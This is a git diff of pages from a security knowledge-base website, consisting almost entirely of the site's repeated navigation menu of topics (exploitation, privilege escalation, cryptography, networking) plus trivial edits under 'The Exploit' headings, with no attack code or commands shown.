      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -270,22 +270,6 @@

The Exploit

- - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html index 70e8c677..7423cad4 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -257,22 +257,6 @@

The Exploit

- - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html index 4e6710ee..a2ba04d8 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
